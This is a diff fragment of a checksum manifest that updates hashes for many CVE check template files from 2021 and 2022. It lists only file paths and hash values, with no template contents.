+http/cves/2021/CVE-2021-40868.yaml:f4b981a63f241f704b6152dd94522213a94ea41a +http/cves/2021/CVE-2021-40870.yaml:ae82ddf00e7c2c5e5f733a4ad7d69887ad59f545 +http/cves/2021/CVE-2021-40875.yaml:d1fcf9879cc90e6d1cf74f37fcd6a8994b043d66 http/cves/2021/CVE-2021-40908.yaml:019099452ecf88aad388040cebef29b6e7ae4e7f -http/cves/2021/CVE-2021-40960.yaml:8c11cf9344c7fa32fe56027a460a2b6d97c26842 +http/cves/2021/CVE-2021-40960.yaml:3af95a4d3124449c4c3a10a2d15a968911397c8c http/cves/2021/CVE-2021-40968.yaml:73923365c5a6fb5375e577b7121b8f57f2fdcc5a http/cves/2021/CVE-2021-40969.yaml:2a5fa3be95f998466cfc276bbf1fd319dd513f27 http/cves/2021/CVE-2021-40970.yaml:15bc9e96f58cb7cc710d828b481eebbefe84ae3d http/cves/2021/CVE-2021-40971.yaml:17777a194f94fedeb34813a7759cf9c580f0f8ae http/cves/2021/CVE-2021-40972.yaml:551cbe522d193ea33f642996fd9dacabda86c9bf http/cves/2021/CVE-2021-40973.yaml:34f4749d5c1f2925647cc438f9ace9c2d829a668 -http/cves/2021/CVE-2021-40978.yaml:020bfb1f6a305b9623a2f50d3bc144ccc0545e84 -http/cves/2021/CVE-2021-41174.yaml:27ea7a0e2d1c370c39171228e95a9dfcfd581735 -http/cves/2021/CVE-2021-41192.yaml:c765092f1f1084d123ee545cd703870357aa0eb5 -http/cves/2021/CVE-2021-41266.yaml:d54e709cfb39e02b6ac3d97f03a9c74d707c1abe -http/cves/2021/CVE-2021-41277.yaml:69875fc3a8d286eae6cf2337afc4e75aa3cf978f -http/cves/2021/CVE-2021-41282.yaml:dec5dc963a38f4943ab92bc17bc6032b4fe42e5c -http/cves/2021/CVE-2021-41291.yaml:3c4ec16001d04bcb25dc9f6651606134a8ac44be -http/cves/2021/CVE-2021-41293.yaml:22a9ae1ce6797e95ab1a1f4c8d66e408420d7424 -http/cves/2021/CVE-2021-41349.yaml:fa0d3cc3697cfda5a729dc6af512f8f0fc8cb8fe -http/cves/2021/CVE-2021-41381.yaml:35dd48f03b231a194d5e5639c7d4e7d8e61913b4 -http/cves/2021/CVE-2021-41432.yaml:88686b80bc2d490aeb19f277c00aca43df5aae96 -http/cves/2021/CVE-2021-41467.yaml:784fee8b870970e2a68ce9758d06eabe87b24344 -http/cves/2021/CVE-2021-41569.yaml:80220417109e2ca89adafaff33af0d7c6e7de70e -http/cves/2021/CVE-2021-41648.yaml:1c6987461122016568772832566c99bcb4bf4727 -http/cves/2021/CVE-2021-41649.yaml:c3b46bb46052de82997aea5da8784f456dc6acd4 -http/cves/2021/CVE-2021-41653.yaml:5e7a31ccf1fb728e21d4fe47d35008c6ae1678c7 -http/cves/2021/CVE-2021-41691.yaml:f616cc8ce80eaedf2e9df69dd41cea8ce9560668 -http/cves/2021/CVE-2021-41773.yaml:f2a98a222c8310a40c9cafa63a26ad25fce6290a -http/cves/2021/CVE-2021-41826.yaml:39034e4cda4da06fb9552f8a571e8b10f1877068 -http/cves/2021/CVE-2021-41878.yaml:872a0c83301b47c9e6313f2a6cbc8e1bec4ad7a1 -http/cves/2021/CVE-2021-4191.yaml:4396434fa9a0993b4b91eb5f30556182e9890bdf -http/cves/2021/CVE-2021-41951.yaml:68f3c87d933823c970381f99fd946b40e1347170 -http/cves/2021/CVE-2021-42013.yaml:521983ff934b8cd8dd115ca22a7e8eff7bd2b3ac -http/cves/2021/CVE-2021-42063.yaml:aa523fe713821d66db42e7cd94f32dea91e0678b -http/cves/2021/CVE-2021-42071.yaml:ae2b781b9f16253cf546fec3588b88bb9db07dae -http/cves/2021/CVE-2021-42192.yaml:7e784ffe2014f23e3c82309d5454858b7bb6ef60 -http/cves/2021/CVE-2021-42237.yaml:af03d8442686fd81e40ba516f4b5a3cb4f2f494e -http/cves/2021/CVE-2021-42258.yaml:c98a88fa7ae4d02e8f570f2083f8ba007eacd0c4 -http/cves/2021/CVE-2021-42551.yaml:62e90a6d3ae4367b1dac1f7bc3bd81f875995e1f -http/cves/2021/CVE-2021-42565.yaml:486dd01d430b6f0b942fbde45e866db80188bf1b -http/cves/2021/CVE-2021-42566.yaml:f3169b7f6f60aedbc66d1522a6eb24bd0dfa1285 -http/cves/2021/CVE-2021-42567.yaml:32c88cb2a16c1644e96bb8fe9a114f2895b55ab2 -http/cves/2021/CVE-2021-42627.yaml:173bf249624cb2a8f1a46c77456ee65c0f63b943 -http/cves/2021/CVE-2021-42663.yaml:790c9372ce6da2c326c3dbc5127b610013a5c785 -http/cves/2021/CVE-2021-42667.yaml:46338878d5df8ae5baa7d524a43967cf12a561e4 -http/cves/2021/CVE-2021-42887.yaml:35fed176e59d8b77182c892629987ddb259ec4c8 -http/cves/2021/CVE-2021-43062.yaml:831e3eaa775eb329839d2b6aa055db3d6337c24e -http/cves/2021/CVE-2021-43287.yaml:49c52d136e1b100afe8e823b210b2cf12b32b6f9 -http/cves/2021/CVE-2021-43421.yaml:dcf96e44020b9912e16bdac5a5e4b0641b47cacb -http/cves/2021/CVE-2021-43495.yaml:6e5f43e83c70b07e04558cb19c374a48621c14f6 -http/cves/2021/CVE-2021-43496.yaml:fb8c4e23a65dab0af684afa383cd55836a2a7cb6 -http/cves/2021/CVE-2021-43510.yaml:6df39012660aa9493d9e4a2d36b54bd6393f7b0e -http/cves/2021/CVE-2021-43574.yaml:58ff17e4c3a7ea7b2be8e886500c9067e98af6bc +http/cves/2021/CVE-2021-40978.yaml:116fc519b7175f6c3bf178d5a24dd902de23cc13 +http/cves/2021/CVE-2021-41174.yaml:51efb467a0750a7f3d63a4573fe87ff58ec634ab +http/cves/2021/CVE-2021-41192.yaml:2ccc37807ffa32ced3d236c1a3ac5711a9de031a +http/cves/2021/CVE-2021-41266.yaml:0c4c37a23d79a1ba210244d2999aba15ba359492 +http/cves/2021/CVE-2021-41277.yaml:f103ca2f08e48d228a718c537dd56653157b7081 +http/cves/2021/CVE-2021-41282.yaml:1f010478423858180376e3f409bda472c00e0b98 +http/cves/2021/CVE-2021-41291.yaml:19214e5770613c8818eb49555391fe4cadb4f3fe +http/cves/2021/CVE-2021-41293.yaml:0578eb34d588fd2e6f6d725a61fb218e1383e956 +http/cves/2021/CVE-2021-41349.yaml:d7b737e828e81ceacdbd7a8bd5a52c502332c5d4 +http/cves/2021/CVE-2021-41381.yaml:31c1896ec7991f4ba1651d9e3258b922424548f1 +http/cves/2021/CVE-2021-41432.yaml:88fff4ce83c7659849775f2aaa34ddc3ce7b293e +http/cves/2021/CVE-2021-41467.yaml:8009bac98a9d461149718b347b44d9987b635d6d +http/cves/2021/CVE-2021-41569.yaml:b26d06b719ba5e88c08bff2cb0105b4b471b4008 +http/cves/2021/CVE-2021-41648.yaml:94285b3fec6cc88109c86787fb2ef2fbe119d0ac +http/cves/2021/CVE-2021-41649.yaml:d3ce3734cf865acda45ed2047f57a2bbb9f49a94 +http/cves/2021/CVE-2021-41653.yaml:bf26bd30f6a1013ca5f3b05620c6f134f0830760 +http/cves/2021/CVE-2021-41691.yaml:1cac223788be3dd166fab6a55848c58cad4a511a +http/cves/2021/CVE-2021-41773.yaml:d941989472484b2918b3e433cf556830c5de91a6 +http/cves/2021/CVE-2021-41826.yaml:a65f90e11088264d9451c081f2137a05f49c4cc3 +http/cves/2021/CVE-2021-41878.yaml:e5c70ec6132352594f94352733842fe1a0354be7 +http/cves/2021/CVE-2021-4191.yaml:639a5e35a9796e7039cfb94bf6a857185bada618 +http/cves/2021/CVE-2021-41951.yaml:9ec45eec9968e937037be3b04aba7131b102fe0a +http/cves/2021/CVE-2021-42013.yaml:b6ed579921ff727f89c39c912ff08ca45f6db381 +http/cves/2021/CVE-2021-42063.yaml:63dc7ab6a34d746d270fa6a25e58dc8aae84b52a +http/cves/2021/CVE-2021-42071.yaml:33299d7d715c4334d384e36271b193c64a3fa5fd +http/cves/2021/CVE-2021-42192.yaml:60a2981002ed9b2ebdff8466a11b66f21de60280 +http/cves/2021/CVE-2021-42237.yaml:8cb1da9de274b9c3653957759056c54b7b547b4c +http/cves/2021/CVE-2021-42258.yaml:d9484b3ebfb980f5779c3b075ba4150da60bf829 +http/cves/2021/CVE-2021-42551.yaml:9c857784401b28710c6abb7f8f4d33db4583c2ad +http/cves/2021/CVE-2021-42565.yaml:e7666c6d8b7f9b3363ad8907aae4a56f727467d9 +http/cves/2021/CVE-2021-42566.yaml:64c6615fc564856075587cb526183b2330c7264b +http/cves/2021/CVE-2021-42567.yaml:883c81e20ef53b09faddf45814fb8d359e26f483 +http/cves/2021/CVE-2021-42627.yaml:afd116d42b30e8ea70f1f5cc4b81addcfebdf7b3 +http/cves/2021/CVE-2021-42663.yaml:546f13bc4e1ed35962a8b433be9313fb3edf73ba +http/cves/2021/CVE-2021-42667.yaml:3ca9844f31f6d558616f307ce85e3247c9c0e1c6 +http/cves/2021/CVE-2021-42887.yaml:000ceebb4ca969ec35b15f5b65224f45ef84979b +http/cves/2021/CVE-2021-43062.yaml:e5a4b9f3d47e1ee60e71a7f5377d6dc22e5095ed +http/cves/2021/CVE-2021-43287.yaml:9a22f1f53c6b400f659821eb91f8f32650d2f611 +http/cves/2021/CVE-2021-43421.yaml:ba30d48252006dfa9790fcf1c4160dc40e2f9c66 +http/cves/2021/CVE-2021-43495.yaml:41483b29f8b27033ed6a4b25a7f523e01422b298 +http/cves/2021/CVE-2021-43496.yaml:f2d492e05c4553f33ccad0fe8c020aa3d24eac71 +http/cves/2021/CVE-2021-43510.yaml:f3eebdf1604dd6d5bfbab2c721bd51c3346a958a +http/cves/2021/CVE-2021-43574.yaml:b32ccb85fb599633feb92b4eea1c4ab7c681b9e0 http/cves/2021/CVE-2021-43725.yaml:36990079e504d6b230db99035ad8e43acdef8090 -http/cves/2021/CVE-2021-43734.yaml:d659477a20d9728aca3c594e7d3bc6dcf08c4c1b -http/cves/2021/CVE-2021-43778.yaml:f08be58409856e45ed966b0d27103d7af708c5cd +http/cves/2021/CVE-2021-43734.yaml:e3c645be8b1f50a7fed704e8025210374eeb2e51 +http/cves/2021/CVE-2021-43778.yaml:6852615f4bc1b24f1af339aed8edd7ba1841d814 http/cves/2021/CVE-2021-43798.yaml:70531e175da021d868e147369c74009bb0664cca -http/cves/2021/CVE-2021-43810.yaml:4b085ef3c4b3898a81fcaeb52093471253c40902 -http/cves/2021/CVE-2021-44077.yaml:20ad1bf0e204493c261edaee0ab5bceac7b4ed7f +http/cves/2021/CVE-2021-43810.yaml:c6c8b80f5e8ffac16920ea90637874e67b0cb32c +http/cves/2021/CVE-2021-44077.yaml:5d8a1c0b9fa5c4e8189e8166c7dda39caa37b0d5 http/cves/2021/CVE-2021-44138.yaml:d532b862e0e65dd6c492db712643e6ffd4661b29 -http/cves/2021/CVE-2021-44152.yaml:455f1a952a207b109fd5e1a7a2a8b9186fee66ff +http/cves/2021/CVE-2021-44152.yaml:2e5e38fbe18ac8ab1e6bd1a426ae6d8413a37fe8 http/cves/2021/CVE-2021-44228.yaml:8ebeadb7fa7adf3b85ce90e8a135f93f29950863 -http/cves/2021/CVE-2021-44427.yaml:b20e854b90060e1bd34195922edef3262f2ebf36 -http/cves/2021/CVE-2021-44451.yaml:b528026d07acb88219398bbfcd7576e99c7d8ec0 -http/cves/2021/CVE-2021-44515.yaml:0018ff14745bbd04c45bd60d6120e2a8f87b73f7 -http/cves/2021/CVE-2021-44528.yaml:c2ed02616c338af4aa93d6b903cd605034a06f66 -http/cves/2021/CVE-2021-44529.yaml:3899724c56538a69464e87e8ea6a19122a95d7fa -http/cves/2021/CVE-2021-44848.yaml:d37afe87de0bf0cedde31670649ecc779e92abb4 -http/cves/2021/CVE-2021-45043.yaml:437e720d54cfaf28b2f484381784153f3442a53a -http/cves/2021/CVE-2021-45046.yaml:5c7d4e3277e0edaace1e9f964b13398391178c13 -http/cves/2021/CVE-2021-45092.yaml:2596555d170a533f62a3553cb52991633a8271cc -http/cves/2021/CVE-2021-45232.yaml:7e76b7bdf61ed19db2954f6f75994e975635d70e -http/cves/2021/CVE-2021-45380.yaml:8738a3ee69dd2f8e234e1373fa641635da242b72 -http/cves/2021/CVE-2021-45422.yaml:851ff3fce506b32f0e0cb5f04303446dbca4f647 -http/cves/2021/CVE-2021-45428.yaml:78a394bf33d6ef88a637a90d7169d1125b13f983 -http/cves/2021/CVE-2021-45967.yaml:07b9be37aa7ac98874324680c9b39bc5bb03dcaf -http/cves/2021/CVE-2021-45968.yaml:a45ac42c6aeb3f9ce86bd98ab150d683dbcf653c -http/cves/2021/CVE-2021-46005.yaml:9e72751e395f8852a7459f10659fb0c22581d909 -http/cves/2021/CVE-2021-46068.yaml:146bcfc67dbaab09fe08b2d39ba2cf7651902584 -http/cves/2021/CVE-2021-46069.yaml:7477307ba737e0cfef0589503c8533854b955da3 -http/cves/2021/CVE-2021-46071.yaml:c840a48687cf0bfac5f8686de4741318a9f1fd00 -http/cves/2021/CVE-2021-46072.yaml:8331dee1bf1604452fde664cb18bedd5475142f0 -http/cves/2021/CVE-2021-46073.yaml:8225b08155c914c543d557efe1531a932694f520 -http/cves/2021/CVE-2021-46379.yaml:6dc812056f7ee07cc5007a76c3e38abef2a3253a -http/cves/2021/CVE-2021-46381.yaml:ccfcddd583bdbb043e401ed129f003578b8a4d17 -http/cves/2021/CVE-2021-46387.yaml:4c99fe80f15d731b588cff0b641d22adb6e234db -http/cves/2021/CVE-2021-46417.yaml:ef1332077aba5456d7face1e549877f5a84567f8 -http/cves/2021/CVE-2021-46422.yaml:7408d34e8fcb49f71420a3dad7e8d86f2bcedd65 -http/cves/2021/CVE-2021-46424.yaml:3d8384c0bafc54b6c72409092a1eb23f5d17d5a5 +http/cves/2021/CVE-2021-44427.yaml:41907d6ccc86ab1101408e9394bc5dda87f08e81 +http/cves/2021/CVE-2021-44451.yaml:6573bbbf4a2873fa034ccb2068186d66b9cf3c45 +http/cves/2021/CVE-2021-44515.yaml:2e2b7a5af5f77f76c136e4f57b5c12be47fa4f46 +http/cves/2021/CVE-2021-44528.yaml:ce2f3ede3d1bca235a3c57af1edef521a4dc6796 +http/cves/2021/CVE-2021-44529.yaml:618d3c3aee68e129f510f33633147f9556c3e884 +http/cves/2021/CVE-2021-44848.yaml:891f1d81ee9d0849695431e9b25f7dad82ad5f5c +http/cves/2021/CVE-2021-45043.yaml:68198fc6ec91002c7c6c8a3237c9522cc906f50b +http/cves/2021/CVE-2021-45046.yaml:a2aca3344e8c7b637b3a063946624e2d11c68127 +http/cves/2021/CVE-2021-45092.yaml:6a69fbe02d5db83b2d82d03981037845aa7dd9d6 +http/cves/2021/CVE-2021-45232.yaml:b528c9927506bc2cafad0edc1926d9185e04cef4 +http/cves/2021/CVE-2021-45380.yaml:42c269f1d6e902cba2e76c908f732e454ab20352 +http/cves/2021/CVE-2021-45422.yaml:7e4517de17c896173e65b256c2531138174b7020 +http/cves/2021/CVE-2021-45428.yaml:57365883f1891d2c838489be04dc8286fd2b0632 +http/cves/2021/CVE-2021-45967.yaml:cb0dea20b923fd34b0b290ad6dc72a7c87abee0c +http/cves/2021/CVE-2021-45968.yaml:f74571e16aecdcd91b173438877a10689e9cb773 +http/cves/2021/CVE-2021-46005.yaml:650f1f53147a51be66b226f280a48524ae4e2f01 +http/cves/2021/CVE-2021-46068.yaml:69e06616b6d481f6d7a42e4ceb48403de11b89cc +http/cves/2021/CVE-2021-46069.yaml:231256b15bd65fed930c1850027c0f93f2df1d63 +http/cves/2021/CVE-2021-46071.yaml:19d910c169290d93f9abc10d4102eb2c1bcd1c1d +http/cves/2021/CVE-2021-46072.yaml:53dbb5991e025925aeea18f4452f31885d6f5c8f +http/cves/2021/CVE-2021-46073.yaml:5b53fed2eaa52d321cdc2e51eb8c671db0360989 +http/cves/2021/CVE-2021-46379.yaml:8046ab64cfe7dc7160be24efad3fb361d072fc06 +http/cves/2021/CVE-2021-46381.yaml:eec3822dfcc8c98488ae2bfda7b4866f07ad68a7 +http/cves/2021/CVE-2021-46387.yaml:c0686d08d3cc0db08247deca7d2274bd7febcf39 +http/cves/2021/CVE-2021-46417.yaml:4189c7707245b9216999142b3de3aae8909cb74b +http/cves/2021/CVE-2021-46422.yaml:954d93eba93256c85f9c0850b4a3386baa6305bc +http/cves/2021/CVE-2021-46424.yaml:657412303fe1246386593db73b37fe24ccd4c24c http/cves/2021/CVE-2021-46704.yaml:ead4e7d9c4a05dfb5aa5045c1b3a1594f6b7c7f8 -http/cves/2022/CVE-2022-0140.yaml:e35651cc2f2691a33c578eb28ae40e49f4f66d96 -http/cves/2022/CVE-2022-0147.yaml:f69bf0598fa81721db47ef4dde1daea2e003c887 -http/cves/2022/CVE-2022-0148.yaml:6cf0fefded7a6d5ef15848958cd831176f38d621 -http/cves/2022/CVE-2022-0149.yaml:28d978200b45b286e043847f9849de213dd16503 -http/cves/2022/CVE-2022-0150.yaml:4d2c876546083367573142cf55e656b71f99fbe8 -http/cves/2022/CVE-2022-0165.yaml:d87aef23a0dd1ab8833d605cb3176b4c0927f5e8 -http/cves/2022/CVE-2022-0189.yaml:70b866b06040408de4f02ff5efce4d4937836d77 -http/cves/2022/CVE-2022-0201.yaml:0bea56d3eb16800c28c4f65aad053d6f2fb09587 -http/cves/2022/CVE-2022-0206.yaml:e6bb9b73928b9b940dabeedb98256bd2730ebf90 -http/cves/2022/CVE-2022-0208.yaml:57ea55d954f30dcc54a7d71e54cec34e05d6806f -http/cves/2022/CVE-2022-0212.yaml:fdd46e69af5fa3c7fd594671c9673c9546395f17 -http/cves/2022/CVE-2022-0218.yaml:3d7bbc57ae765b978ddadf9f1fbe249411df85c0 -http/cves/2022/CVE-2022-0220.yaml:f345ef9f2fa0720df936c5712930c891fe8a2d6c -http/cves/2022/CVE-2022-0234.yaml:b7c28ed5a29ba7a4a4b1933057e2203b64a28312 -http/cves/2022/CVE-2022-0271.yaml:0436fbc89f9b18ef2b05e40f8bfaf248c36da089 -http/cves/2022/CVE-2022-0281.yaml:f0cf4c17d86214fc34631652bf8ee3d4d3e03bab -http/cves/2022/CVE-2022-0288.yaml:58a248ac86585f1c9aadec7456a633052813813a -http/cves/2022/CVE-2022-0346.yaml:b05f29eca744f3a6de6659e8b94bff615f990dfa -http/cves/2022/CVE-2022-0349.yaml:b4574b39a0f41ca28a19c4066525cee0d5ac5b37 -http/cves/2022/CVE-2022-0378.yaml:4826d756d546fe4789be57704351e0cc4abd4cea -http/cves/2022/CVE-2022-0381.yaml:1cd7a53fea23ba749f7a60d14ef129060deaf844 -http/cves/2022/CVE-2022-0412.yaml:96107f9f26791673df6053284699574fd2912d93 -http/cves/2022/CVE-2022-0415.yaml:498e4524fe03424260b48c20c25eaa9e0596d3d6 -http/cves/2022/CVE-2022-0422.yaml:00fa74ff075ae74c3be857e862dda280d9f3ffe4 -http/cves/2022/CVE-2022-0432.yaml:566b3ccaf1ce3613047349efdda1ce51b0a9a329 -http/cves/2022/CVE-2022-0434.yaml:cc966e420ccf36a4a6aaecde972be1334bbe6eb6 -http/cves/2022/CVE-2022-0437.yaml:837934cb1ad5a82160db7c7fdc9ce572a355af73 -http/cves/2022/CVE-2022-0441.yaml:5fde9be5b1c1220b1259efb3ad18cc34bab251ca -http/cves/2022/CVE-2022-0482.yaml:22f92abbfa71110199ccc9c79d650c55553632f3 -http/cves/2022/CVE-2022-0535.yaml:64aa5075ba0df1744fc3a40b67b4075160500b5b -http/cves/2022/CVE-2022-0540.yaml:6fc555f9b66755718ea3676bc52385917f7595a6 -http/cves/2022/CVE-2022-0591.yaml:ea80772e0cc948889d5bd186f3ec6d7a9732e8d8 -http/cves/2022/CVE-2022-0594.yaml:230f79355091de257367d3b0615b04d14f5e540f -http/cves/2022/CVE-2022-0595.yaml:5cec39fe2c4543c8da6dbf62fa25b1d9a06083f6 -http/cves/2022/CVE-2022-0599.yaml:09ae6cc2e03c61e5aeb9d94391516ca4d7a71f39 -http/cves/2022/CVE-2022-0653.yaml:d8d43936079779a9677f6e2d9dc2326062ef771b -http/cves/2022/CVE-2022-0656.yaml:8156cc9b43478e286dec35b5cd37a72dc9fd165c -http/cves/2022/CVE-2022-0660.yaml:84e3e72ec5ee33890ca2b576374808d090fb9c8e -http/cves/2022/CVE-2022-0678.yaml:62a2c3d50010562070cfd8cbca65503438422130 -http/cves/2022/CVE-2022-0679.yaml:675b2d2b551648fc188b0784d82219df4f1b942e -http/cves/2022/CVE-2022-0692.yaml:6f25b480137ed196bccec003777e77a40a6d2f97 -http/cves/2022/CVE-2022-0693.yaml:23f85958d6b68045fba6760715a67424d9c147cf -http/cves/2022/CVE-2022-0735.yaml:c9b34d1ad67225808352dd662a0ca007d571bbb7 +http/cves/2022/CVE-2022-0140.yaml:0975b1e9851d840f3fa2c928cc258adc0b44600e +http/cves/2022/CVE-2022-0147.yaml:fca164f2412c8e7776af3c24568b285d18ac96dd +http/cves/2022/CVE-2022-0148.yaml:039b4e25fb5abd459f2b2a1e8cd514850a29840e +http/cves/2022/CVE-2022-0149.yaml:35ed140ea1b3c566b61550afbc43c665f38493e0 +http/cves/2022/CVE-2022-0150.yaml:adf304830ffa4324150abe2b94013a9e56255da4 +http/cves/2022/CVE-2022-0165.yaml:5258477203e7b9e407b54048b544a04c310b611f +http/cves/2022/CVE-2022-0189.yaml:32c079425b101e5fcd8d5e82948d464991b3230d +http/cves/2022/CVE-2022-0201.yaml:502f7aa10b42fb91fe45dcfbe092c2a443c25be2 +http/cves/2022/CVE-2022-0206.yaml:986028837c2a0e55ed514a596638f2955bc7fbf3 +http/cves/2022/CVE-2022-0208.yaml:cf212b79e04cfac31faf59e5d8f7e463ccc3a8b9 +http/cves/2022/CVE-2022-0212.yaml:6584090d0f13af1b1a3f1105b4c17a7c61c868ef +http/cves/2022/CVE-2022-0218.yaml:5b77750a63a7eeeb445c69dd106bd67e1ac4f1cd +http/cves/2022/CVE-2022-0220.yaml:4492c0907b0e5245c8d93dfaa7bb49e24d323897 +http/cves/2022/CVE-2022-0234.yaml:cacee683954255f9d054d85ae41376093bce12d7 +http/cves/2022/CVE-2022-0271.yaml:68b3c5a3a6b6d099eb4c85bab2efd4170b7f2ef1 +http/cves/2022/CVE-2022-0281.yaml:ee77f665ec9ace69c24b9a730ef892aa35c1c8e3 +http/cves/2022/CVE-2022-0288.yaml:0359c13bf0c81f6c317c00f43a4d42ab4a67df1a +http/cves/2022/CVE-2022-0346.yaml:c9e7ffa68d76d7f42eecf86bf467d204a605c4bc +http/cves/2022/CVE-2022-0349.yaml:fe1236cca3496f4b451a4d72057733b05242d248 +http/cves/2022/CVE-2022-0378.yaml:f3400e705f8adb4333d97076146a93c47859473a +http/cves/2022/CVE-2022-0381.yaml:fa6050f367f35e4a23927e7173e442141d65d29a +http/cves/2022/CVE-2022-0412.yaml:5d03a780b31fae0057faac4e2c72ef0a636c5d8c +http/cves/2022/CVE-2022-0415.yaml:03e04264b0d0e9a484b0479128ded75c493973f4 +http/cves/2022/CVE-2022-0422.yaml:78a09e3c3398a92af73e8f1fbf133736876e1804 +http/cves/2022/CVE-2022-0432.yaml:662ece91415aaa1d0266a263f361a7e193c8d1ff +http/cves/2022/CVE-2022-0434.yaml:b72aac12f9010cacdc388309f6f73f31e5b28e9a +http/cves/2022/CVE-2022-0437.yaml:0b3d930f0a159ae99c065e5c35bcb6ac9e9b2e82 +http/cves/2022/CVE-2022-0441.yaml:f1d0676dd3da1d03596a86354110136a69955d66 +http/cves/2022/CVE-2022-0482.yaml:58c56a97b414f603aee0d47123766184a21b877a +http/cves/2022/CVE-2022-0535.yaml:a09ab9db983a220d4ee02ce8a9996e6b698b1d12 +http/cves/2022/CVE-2022-0540.yaml:91baa3681065564385561fb761a156329b91b611 +http/cves/2022/CVE-2022-0591.yaml:2b7bbf7cfef18924716da308d110f9a4a92157d8 +http/cves/2022/CVE-2022-0594.yaml:75090b2a477b35b8f30ec7d62f3a9d64f206e2da +http/cves/2022/CVE-2022-0595.yaml:2253eb591454d5616403ac8670027169d6d7aea1 +http/cves/2022/CVE-2022-0599.yaml:5e7a0f753054a06f01d9707511b31870b9668e7e +http/cves/2022/CVE-2022-0653.yaml:c568a6624c6f1ed85aeae68f837898e813b80ab1 +http/cves/2022/CVE-2022-0656.yaml:2592c69d68fe5d31861200e344afa714791c8cbf +http/cves/2022/CVE-2022-0660.yaml:e488ede831885df9ada6d7219ebada17b28e53fd +http/cves/2022/CVE-2022-0678.yaml:d108b320cec7b7b58e91a2c2b1113aba6f3f845c +http/cves/2022/CVE-2022-0679.yaml:12c343b2a751f0eae40b4d4b4461db52add744d3 +http/cves/2022/CVE-2022-0692.yaml:38181e3715729451dcc0f42835e6f6a3c5e15fe5 +http/cves/2022/CVE-2022-0693.yaml:f42b17be56384fa20c1b3ec30d2ae62a52fdc45a +http/cves/2022/CVE-2022-0735.yaml:93d3909414a29129e97a6098daea59d666133719 http/cves/2022/CVE-2022-0747.yaml:ed4764f8cb9fb5fbee58a10302b5558a6e20ad92 -http/cves/2022/CVE-2022-0760.yaml:e0075a45db8dea99e398b2425f801328a4ec36cd +http/cves/2022/CVE-2022-0760.yaml:0cd05f4bdc8a0a56e4cebff3935bb4e23ba9814e http/cves/2022/CVE-2022-0769.yaml:2cc0bf52f616739affaeaef9f747f725ed8ae811 http/cves/2022/CVE-2022-0773.yaml:e8edcb2c01168142ee0acf306a414805f29e6451 -http/cves/2022/CVE-2022-0776.yaml:8a6f3bb3ab4a38013557885af61f678bf8f2c1c1 -http/cves/2022/CVE-2022-0781.yaml:bfbf508850257a34ff5c3991c84dafbd76050e21 -http/cves/2022/CVE-2022-0784.yaml:61287a6dcdb7a9e275d509110e75e320d3ae53a3 -http/cves/2022/CVE-2022-0785.yaml:31f2b839e067ebe1a0c4726f1ec024bc2894c6bc -http/cves/2022/CVE-2022-0786.yaml:0d925e511467b43bc49ca1503a56015b9f660ede -http/cves/2022/CVE-2022-0788.yaml:64228895e8770745d4d2700539b50cbde208c64c -http/cves/2022/CVE-2022-0817.yaml:43624c735fbbf7f4e983441633a3e8e271db8a86 -http/cves/2022/CVE-2022-0824.yaml:60acb8981c53e7b4c834aece0fa4182002c1493e -http/cves/2022/CVE-2022-0826.yaml:be839ead1883660539164986254604bd109ff94b -http/cves/2022/CVE-2022-0827.yaml:a1f3a776f535de3e3d2b0505043c16bcde58a104 +http/cves/2022/CVE-2022-0776.yaml:6bde259686fc6c2a68e38bc8a40616524770ca82 +http/cves/2022/CVE-2022-0781.yaml:4be835f5d27c01608defe6dfe991ba16d47b49c8 +http/cves/2022/CVE-2022-0784.yaml:27f6a79d7e5bfda1a03322c39f3ca5d55c2d77aa +http/cves/2022/CVE-2022-0785.yaml:ad28a3d05df1bf2c0cff89c6fd9a7f28e811cb44 +http/cves/2022/CVE-2022-0786.yaml:d8b23c900f010b5941ea23609d3e23d55b50605e +http/cves/2022/CVE-2022-0788.yaml:f19a4e74ea2d95ce23cfff9aea11dc1ca10959c9 +http/cves/2022/CVE-2022-0817.yaml:af5cb0bdee000a7b7b5fddbdf7e6f1fa3c6c54b3 +http/cves/2022/CVE-2022-0824.yaml:ba9b75c556e3c23748289f9b68d43db992fe47d7 +http/cves/2022/CVE-2022-0826.yaml:2a38a46e0ee9cd4b36b830916ee3da3efef9a15b +http/cves/2022/CVE-2022-0827.yaml:2fe31f769e121ebb5460c2d72adbb8c03a80f9e2 http/cves/2022/CVE-2022-0846.yaml:518d4708eb3a8f33e85d9ab55a3d749a81eed6b7 http/cves/2022/CVE-2022-0864.yaml:921cfe35449ddd92eab7d370ec271a8d29733f7d -http/cves/2022/CVE-2022-0867.yaml:64bd48257d30adfdcdf52f23fed1424d03060f2e +http/cves/2022/CVE-2022-0867.yaml:fecafbd7d82b96fed050aa613d15f9fabb1210a5 http/cves/2022/CVE-2022-0869.yaml:4a72eb72bc254c0174c43f3bbdc586a2bebfe9c5 -http/cves/2022/CVE-2022-0870.yaml:03e0e71ab204180b4c34938f4fe6f8c3db929273 -http/cves/2022/CVE-2022-0885.yaml:44fbf2521db7ba8b4eae761c345f776ac4969581 -http/cves/2022/CVE-2022-0928.yaml:6e22511a0f6786c308f8e2c3fb0145502736efde -http/cves/2022/CVE-2022-0948.yaml:5c50749d788db43ab661058821b96b09ef001656 -http/cves/2022/CVE-2022-0949.yaml:1d26193d5f6f4b6d3ca7ef79e9ae6582da34ee5f -http/cves/2022/CVE-2022-0952.yaml:b8a3ef0477b2125a0384993475a90dad2b2851ca -http/cves/2022/CVE-2022-0954.yaml:baa0af5f1fc109bc2c9f72c806f6d734e8f1bee3 -http/cves/2022/CVE-2022-0963.yaml:07dcb089405e16371928e6dfb76687713e0cbe5e -http/cves/2022/CVE-2022-0968.yaml:5bc252fbe13a5e20a4dcb1289b9ebdd2174d841f -http/cves/2022/CVE-2022-1007.yaml:9468fa5f044e8634e71734753ff5fd35f369c7e4 -http/cves/2022/CVE-2022-1013.yaml:74a744f045ef675e32f1ebaa64f53ee8fd0166cf -http/cves/2022/CVE-2022-1020.yaml:b6a66726ef03e6d747019c35822d31a7aae77dac -http/cves/2022/CVE-2022-1040.yaml:7fc99abbbf68cefe59d8968b7cd7e2e53fd8f4e0 -http/cves/2022/CVE-2022-1054.yaml:3d3107e7703994c1fcad23d767cc7659f9a8ddea -http/cves/2022/CVE-2022-1057.yaml:34b4cff00db389e02305e42af62fb7a7fb324e1f -http/cves/2022/CVE-2022-1058.yaml:a660b7d334c079e43fc3444d858e3b8387055f76 -http/cves/2022/CVE-2022-1119.yaml:0691a5de08152534285648a1f09b113b225ccfa4 -http/cves/2022/CVE-2022-1162.yaml:9a904e4d8685e3ed92de723792edee05ad14acdd 